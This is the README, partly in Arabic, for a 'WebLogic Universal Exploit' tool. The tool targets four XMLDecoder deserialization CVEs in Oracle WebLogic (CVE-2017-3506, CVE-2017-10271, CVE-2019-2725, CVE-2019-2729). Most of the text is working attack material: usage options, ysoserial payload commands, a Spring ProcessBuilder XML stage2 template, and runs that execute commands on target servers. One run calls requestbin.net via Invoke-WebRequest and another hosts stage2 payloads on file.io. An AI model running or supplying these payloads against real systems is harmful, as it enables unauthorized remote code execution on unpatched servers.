
إلغاء التسلسل غير الآمن في WebLogic - منشئ الحمولة وأداة الاستغلال CVE-2019-2725
WebLogic Universal Exploit - CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 مُنشئ الحمولة والاستغلال
$ python3 weblogic_exploit.py -h
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
usage: weblogic_exploit.py [-h] [-pl PAYLOAD] [-ep ENDPOINT] [-c CMD] [-j]
[-u URL] [-y YSOSERIAL] [-tr TERMINAL] [-px PROXY]
target
positional arguments:
target Target Server
optional arguments:
-h, --help show this help message and exit
-pl PAYLOAD, --payload PAYLOAD Use one of the available payloads: (default: fs_xml_app_ctx)
- process_builder (CMD - all versions)
- unit_of_work_change_set (SERIAL - 10.x versions)
- event_data (CMD - 12.x versions)
- fs_xml_app_ctx (URL - all versions).
-ep ENDPOINT, --endpoint ENDPOINT Use one of the configured endpoints: (default: automatic)
- wls_wsat (CMD output)
- _async (Blind Exec).
-c CMD, --cmd CMD Command to execute. (default: whoami)
-j, --jdk6 Enable CVE-2019-2729 (bypass for 'class'). DISCLAIMER: Works ONLY in JDK 1.6!
-u URL, --url URL Url to fetch stage2. Used with 'URL' payloads. (default: None)
-y YSOSERIAL, --ysoserial YSOSERIAL Custom YSOSERIAL payload file. Used with 'SERIAL' payloads. (default: None)
-tr TERMINAL, --terminal TERMINAL Use one of the available terminals: cmd, bash, powershell, none (default: bash)
-px PROXY, --proxy PROXY Configure a proxy in the format http://127.0.0.1:8080/ (default: None)
This script will generate a valid WebLogic SOAP payload to exploit different CVE's on this web server.
مع حمولات SERIAL، يمكنك تمرير cmd (لتوليد حمولة ysoserial ديناميكيًا) أو توليد حمولة ysoserial يدويًا وإعطائها للسكريبت باستخدام الوسيط -y.
لتوليد حمولة ysoserial ديناميكيًا، يجب تنزيل https://github.com/pimps/ysoserial-modified/blob/master/target/ysoserial-modified.jar ووضعها في نفس مجلد هذا السكريبت.
من المعروف أن حمولة unit_of_work_change_set تعمل فقط في إصدارات weblogic 10.x. أمثلة:
pimps$ java -jar ysoserial-modified.jar Jdk7u21 bash 'nslookup your.server.com' > ysoserial_payload.bin
pimps$ python3 weblogic_exploit.py -y ysoserial_payload.bin -pl unit_of_work_change_set -px http://127.0.0.1:8080 https://target.server.com
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
[+] YSOSERIAL payload size: 3182
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:
HTTP/1.1 202
Connection: close
Date: Wed, 28 Aug 2019 01:39:52 GMT
Content-Length: 0
pimps$ python3 weblogic_exploit.py -c 'nslookup your.server.com' -pl unit_of_work_change_set -px http://127.0.0.1:8080 https://target.server.com
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
[+] YSOSERIAL payload size: 3027
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:
HTTP/1.1 202
Connection: close
Date: Wed, 28 Aug 2019 01:46:33 GMT
Content-Length: 0
مع حمولات URL (FileSystemXmlApplicationContext) يمكنك استضافة ملف XML الخاص بك وتمريره عبر الوسيط -u، أو دع الأداة تولّد لك ملف حمولة مؤقتًا وتستضيفه على https://file.io! سيتم توليد هذه الحمولة أثناء مرحلة الاستغلال وسيتم حذفها بمجرد أن يجلبها الخادم عن بُعد. إذا كنت تريد استضافة حمولتك الخاصة، فيرجى استخدام القالب التالي لهذا الغرض:
<?xml version="1.0" encoding="utf-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[echo "this is my bash command, change terminal if needed"]]></value>
</list>
</constructor-arg>
</bean>
</beans>
من المعروف أن هذه الحمولة تعمل على جميع إصدارات weblogic. عيب هذه الحمولة هو أنها تتطلب اتصالًا صادرًا (egress) من الخادم الهدف لجلب حمولة المرحلة الثانية (stage2). مثال على كيفية استخدام هذه الحمولة موصوف أدناه:
$ python weblogic_exploit.py -tr powershell -c 'Invoke-WebRequest http://requestbin.net/r/h4x31337' -pl fs_xml_app_ctx -px http://127.0.0.1:8080 https://target.server.com
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
[-] No stage2 URL provided... Storing it now...
[+] Stage2 payload stored with success at: https://file.io/IbCIbg
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:
HTTP/1.1 202
Connection: close
Date: Tue, 27 Aug 2019 07:42:24 GMT
Content-Length: 0
وأخيرًا وليس آخرًا، حمولة process_builder هي حمولة الاستغلال الأكثر شيوعًا (وحدة metasploit) التي تعمل على إصدارات weblogic غير المصححة تجاه القائمة السوداء class=. تم تخصيص هذه الحمولة لطباعة مخرجات الأمر في نص استجابة الطلب. مثال على الاستخدام:
pimps$ python3 weblogic_exploit.py -c "id; uname -a" -pl process_builder http://localhost:7001/
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:
HTTP/1.1 200
Connection: close
Date: Thu, 29 Aug 2019 12:30:26 GMT
Transfer-Encoding: chunked
uid=1000(oracle) gid=1000(oracle) groups=1000(oracle)
Linux wlsadmin 4.9.125-linuxkit #1 SMP Fri Sep 7 08:20:28 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
تمت إضافة دعم للحمولة event_data مع إخراج الأوامر في نص الاستجابة. مثال على الاستخدام:
$ python3 weblogic_exploit.py -c 'id; uname -a' -pl event_data http://localhost:7001
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:
HTTP/1.1 200
Connection: close
Date: Thu, 29 Aug 2019 07:37:26 GMT
Transfer-Encoding: chunked
uid=1000(oracle) gid=1000(oracle) groups=1000(oracle)
Linux wlsadmin 4.9.125-linuxkit #1 SMP Fri Sep 7 08:20:28 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
تنويه: استخدمت جزءًا من الحمولة المنشورة في هذا المستودع على github لطباعة نتائج الأوامر في نص الاستجابة (https://github.com/lufeirider/CVE-2019-2725/blob/master/CVE-2019-2725.py). شكرًا لمشاركة هذا @lufeirider.
تمت إضافة دعم لـ CVE-2019-2729. إنه تجاوز لتغيير <class> </class> إلى <array method="forName"> </array>. يعمل هذا التجاوز فقط على JDK 1.6 بسبب اختلاف في كيفية تحليل هذا الإصدار من JDK لبيانات XML عبر XMLDecoder.
تمت إضافة وسيط الأمر -j/--jdk6 إلى سكريبت الاستغلال.